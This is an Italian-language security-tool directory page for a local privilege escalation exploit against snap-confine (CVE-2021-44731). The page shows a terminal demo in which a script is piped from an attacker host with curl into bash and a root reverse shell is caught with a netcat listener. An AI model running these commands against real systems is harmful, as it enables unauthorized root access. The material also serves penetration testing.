Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-44731-snap-confine-SUID — Exploit di escalation dei privilegi locali per CVE-2021-44731 che colpisce snap-confine versioni 2.54.2 e precedenti. Rileva automaticamente i binari vulnerabili e fornisce una shell di root tramite netcat. | Kitploit
Strumenti/GitHubGitHub/deeexcee-io/cve-2021-44731-snap-confine-suid
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitPost-ExploitPenetration TestingRed Teaming
GitHubdeeexcee-io/cve-2021-44731-snap-confine-suid

CVE-2021-44731-snap-confine-SUID

Exploit di escalation dei privilegi locali per CVE-2021-44731 che colpisce snap-confine versioni 2.54.2 e precedenti. Rileva automaticamente i binari vulnerabili e fornisce una shell di root tramite netcat.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
4213 anni faNon ancora revisionato

CVE-2021-44731-snap-confine-SUID

Exploit di escalation dei privilegi locale per CVE-2021-44731, snap-confine 2.54.2 e versioni precedenti

Tutto il merito a Qualys per aver scoperto questa vulnerabilità e fornito un exploit dettagliato.

https://www.qualys.com/2022/02/17/cve-2021-44731/oh-snap-more-lemmings.txt

LPE snap-confine rapido e sporco. Cerca una versione vulnerabile di snap-confine e, se la trova, la sfrutta.

Restituisce una shell di root, da intercettare con netcat

root@kitploit:~
$id
uid=1001(vulnchain) gid=1001(vulnchain) groups=1001(vulnchain)
$ curl http://10.8.0.134/snap_confine_LPE.sh | bash
curl http://10.8.0.134/snap_confine_LPE.sh | bash
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  2073  100  2073    0     0  28397      0 --:--:-- --:--:-- --:--:-- 28013
Non-vulnerable version found: 2.54.3
Vulnerable version found: 2.44.3 at /usr/lib/snapd/snap-confine
Vulnerable version found: 2.44.3 at /home/vulnchain/snap-confine
Performing actions with a vulnerable version...
Chosen vulnerable version: 2.44.3

Shell di root

root@kitploit:~
┌──(root㉿kali)-[~]
└─# nc -lvnp 4447    
listening on [any] 4447 ...
connect to [10.8.0.134] from (UNKNOWN) [10.10.111.136] 56050
bash: cannot set terminal process group (609): Inappropriate ioctl for device
bash: no job control in this shell
root@ip-10-10-10-14:/# id
id
uid=0(root) gid=0(root) groups=0(root),1001(vulnchain)
root@ip-10-10-10-14:/# 
Scarica lo strumento